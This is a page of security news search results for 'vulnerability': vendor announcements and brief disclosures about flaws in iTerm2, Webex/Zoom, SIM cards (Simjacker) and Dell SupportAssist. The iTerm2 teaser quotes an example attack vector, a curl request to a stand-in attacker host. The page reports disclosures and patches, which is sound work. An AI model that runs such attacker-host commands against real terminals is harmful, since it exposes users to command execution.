Search results for: vulnerability

Trend Micro and Snyk provide open source vulnerability intelligence for DevOps

Trend Micro, the global leader in cloud security, announced a strategic partnership with Snyk, the leader in developer-first open source security. The partnership will focus on solving the unrelenting challenge that open source vulnerabilities create for developers, stemming from code-reuse, public repositories and open source. Together, Trend Micro and Snyk will help businesses manage the risk of vulnerabilities without interrupting the software delivery process. The combination of open source vulnerability intelligence from Snyk and Trend … More

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More

Cisco WebEx

Vulnerability in Cisco Webex and Zoom may expose online meetings to snooping

Cequence Security’s CQ Prime Threat Research Team discovered of a vulnerability in Cisco Webex and Zoom video conferencing platforms that potentially allows an attacker to enumerate or list and view active meetings that are not protected. The web conferencing market includes nearly three dozen vendors, some of whom may use similar meeting identification techniques. Although the CQ Prime team did not test each of these products, it is possible they could be susceptible as well. … More

Simjacker

Simjacker vulnerability actively exploited to track, spy on mobile phone owners

Following extensive research, AdaptiveMobile Security has uncovered a new and previously undetected vulnerability. This vulnerability is currently being exploited and is being used for targeted surveillance of mobile phone users. The vulnerability and its associated attacks have been named Simjacker as it involves the hijacking of SIM cards and threatens mobile phone users across the globe. What does Simjacker do? Simjacker extracts the location information of mobile phone users from vulnerable operators, retrieved using malicious … More

AlertEnterprise’s Airport Guardian integration helps airports reduce vulnerability and risk

AlertEnterprise, the leading physical-logical security convergence software company, has successfully integrated its Airport Guardian software with the Federal Bureau of Investigation’s (FBI) Record of Arrest and Prosecution Background (Rap Back) service. By integrating the Rap Back service, Airport Guardian software is designed to help airports significantly reduce vulnerability and risk in vetting the security backgrounds of job applicants and employees. The integration delivers real-time and continuous criminal history record checks (CHRC) during personnel selection and … More

Qualys

Securing the cloud: Visibility, compliance and vulnerability management

In this Help Net Security podcast recorded at Black Hat USA 2019, Hari Srinivasan, Director of Product Management for Qualys, talks about the basics of securing your cloud. Here’s a transcript of the podcast for your convenience. Hello and welcome to today’s podcast. A bunch of questions are being thrown again about cloud security. Is the cloud inherently secure? Isn’t it too chaotic and elastic that implementing a security strategy is really tough? My name … More

Greenbone introduces virtual appliances for vulnerability management

Greenbone, a leading provider of vulnerability analysis for IT networks, announced that its portfolio of vulnerability management (VM) products is now available via virtual appliances. Greenbone’s customers can now choose to deploy physical or virtual appliances, increasing flexibility and efficiency, while ensuring that data protection is always guaranteed. VM solutions identify and patch security-relevant vulnerabilities in IT systems, helping businesses reduce their exposure to risks and improving the overall resilience of their infrastructures. Greenbone’s entire … More

Denim Group integrates Jenkins Plugin with ThreadFix vulnerability management platform

Denim Group, the leading independent application security firm, announced the latest version of their Jenkins Plugin to integrate with their flagship vulnerability management product, ThreadFix. This plugin will allow development teams to incorporate application security testing into continuous integration and continuous delivery (CI/CD) pipelines, encouraging teams to address security concerns in a flexible manner. ThreadFix allows organizations to manage their application security programs and address risks to business operations that could be affected by vulnerabilities … More

Flexera unveils Vendor Patch Module for its Software Vulnerability Manager

Flexera, the software company that helps organizations realize technology’s power to accelerate their business, releases an add-on module for its popular Software Vulnerability Manager – Vendor Patch Module. The number of constant exploits, attacks and other software vulnerabilities has become unmanageable, and attempts to keep up can be overwhelming. Flexera Software Vulnerability Manager (SVM) was designed to identify these vulnerabilities and help prioritize remediation efforts. With the new Vendor Patch Module, organizations are able to … More

open source

1 in 10 open source components downloaded in 2018 had a known security vulnerability

This year’s Sonatype report reveals the best practices exhibited by exemplary open source software projects and commercial application development teams. As in years past, it also examines the rapidly expanding supply and continued exponential growth in consumption of open source components. For the fifth anniversary report, Sonatype collaborated with Gene Kim from IT Revolution, and Dr. Stephen Magill from Galois and MuseDev. Together with Sonatype, the researchers objectively examined and empirically documented, release patterns and … More

Dell laptop

Dell fixes high-risk vulnerability in pre-installed SupportAssist software

Dell pushed out fixes for a high-risk vulnerability in its pre-installed SupportAssist software and urges users who don’t have auto updating enabled to upgrade the software manually. About the vulnerability (CVE-2019-12280) Dell SupportAssist software, which comes pre-installed on most Dell laptops and computers running Windows, has administrator-level access to the operating system (via a signed driver) because it must be able to identify issues, run diagnostics, driver-update scans, and install drivers. In May, researcher Bill … More

Arctic Wolf Managed Risk solution provides proactive vulnerability management services

Arctic Wolf Networks, a leading security operations center (SOC)-as-a-service company, announced the Arctic Wolf Managed Risk solution to provide proactive identification, analysis, and prevention of vulnerabilities. “Companies know that they need to reduce their attack surface, but they often don’t know where to begin. Arctic Wolf Managed Risk service helps companies make sense of their cyber risk profile, by continuously scanning internal/external networks and endpoints, and quantifying cyber risk-based vulnerabilities,” said Brian NeSmith, CEO and … More